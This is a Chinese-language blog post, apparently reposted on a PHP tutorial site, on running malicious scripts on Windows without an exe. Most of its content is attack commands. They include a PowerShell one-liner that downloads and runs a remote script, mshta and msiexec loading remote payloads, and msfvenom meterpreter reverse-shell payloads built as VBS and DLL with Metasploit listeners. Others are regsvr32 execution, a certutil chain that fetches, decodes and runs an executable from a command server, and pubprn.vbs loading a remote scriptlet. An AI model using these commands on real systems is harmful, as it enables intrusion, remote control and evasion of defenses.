windows无exe-linux运维-PHP中文网

windows无exe

星夢妙者

发布： 2025-07-20 08:46:12

原创

459人浏览过

大家好，很高兴再次与你们见面，我是你们的朋友全栈君。

在Windows系统中，恶意脚本的加载和执行可以通过多种无需可执行文件（exe）的方式来实现。这些方法利用了Windows自带的解析器和工具，具体包括以下几种：

恶意脚本加载方式

PowerShell、VBScript、批处理文件和JavaScript

这些脚本可以通过Windows自带的解析器运行，如powershell.exe、cscript.exe、cmd.exe和mshta.exe。通过上传或远程加载相应的payload脚本，并直接调用解析器运行，可以实现恶意代码的执行。可以使用Invoke-Obfuscation或者Invoke-DOSfuscation等工具进行混淆。

Windows原生工具

Windows自带的工具如regsvr32.exe、rundll32.exe、certutil.exe、schtasks.exe、wmic.exe等，以及脚本类型的winrm.vbs、wmiexec.vbs、pubprn.vbs等，可以用于执行恶意代码、启动程序、执行脚本、窃取数据、横向扩展和维持访问。

具体示例

PowerShell

powershell "IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/Script.ps1'); Script [argv]"

登录后复制

mshta.exe

use exploit/windows/misc/hta_server
set lhost x.x.x.x
set lport 4444
run

登录后复制

mshta.exe执行

mshta http://192.168.164.128:8080/lWdH9aFeeIe.hta

登录后复制

windows无exe

CScript.exe和WScript.exe

这两个工具可以解析和运行VBScript和JavaScript脚本。WScript将输出结果显示在对话框中，而CScript则以命令行形式显示输出结果。使用方法如下：

cscript %TEMP%\log.vbs 或者 wscript C:\test.js

登录后复制

使用msfvenom生成VBS脚本

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.164.128 lport=4444 -f vbs -o 123.vbs

登录后复制

使用Metasploit监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
run

登录后复制

执行生成的VBS脚本

cscript 123.vbs

登录后复制

regsvr32.exe加载DLL

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.164.128 lport=4444 -f dll -o 123.dll

登录后复制

使用regsvr32.exe执行DLL

regsvr32 /u /s 123.dll

登录后复制

certutil.exe

certutil.exe -urlcache -split -f [URL] outfile.file
certutil.exe -verifyctl -f -split http://www.baidu.com #无法绕过defender

登录后复制

编码

base64 payload.exe > /var/www/html/update.txt

登录后复制

解码并执行

certutil -urlcache -split -f http://cc_server/update.txt & certutil -decode update.txt update.exe & update.exe

登录后复制

winrm.vbs

cscript C:windowssystem32winrm.vbs invoke Create wmicimv2/Win32_Process -SkipCAcheck -SkipCNcheck -file:123.xml

登录后复制

123.xml内容

<?xml version="1.0" encoding="UTF-8"?><create_input xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Process"><commandline>calc.exe</commandline><currentdirectory>C:</currentdirectory></create_input>

登录后复制

windows无exe

无涯·问知

无涯·问知，是一款基于星环大模型底座，结合个人知识库、企业知识库、法律法规、财经等多种知识源的企业级垂直领域问答产品

查看详情

无文件执行

Winrm invoke Create wmicimv2/Win32_Process @{    CommandLine="calc.exe";CurrentDirectory="C:"}

登录后复制

windows无exe

msiexec.exe

C:WindowsSystem32msiexec.exe /q /i http://192.168.164.128:8080/123.msi

登录后复制

wmic.exe

# 暂无

登录后复制

pubprn.vbs

位于C:WindowsSystem32Printing_Admin_Scripts下的语言目录中，可以用来解析sct文件。

pubprn.vbs 127.0.0.1 script:http://x.x.x.x/payload1.sct

登录后复制

参考资料：https://www.php.cn/link/29353ce24ad093d9324c479b7a1bd107

发布者：全栈程序员栈长，转载请注明出处：https://www.php.cn/link/f48db3cd91ebb288ff33e95493b6329b

原文链接：https://www.php.cn/link/c8377ad2a50fb65de28b11cfc628d75c

以上就是windows无exe的详细内容，更多请关注php中文网其它相关文章！

大家都在看：

初识Git 【Git】003-常用Linux命令 Linux下的git开篇第一文：git的意义 Git分支教程：详解分支创建、合并、删除等操作 Ubuntu Java如何使用Git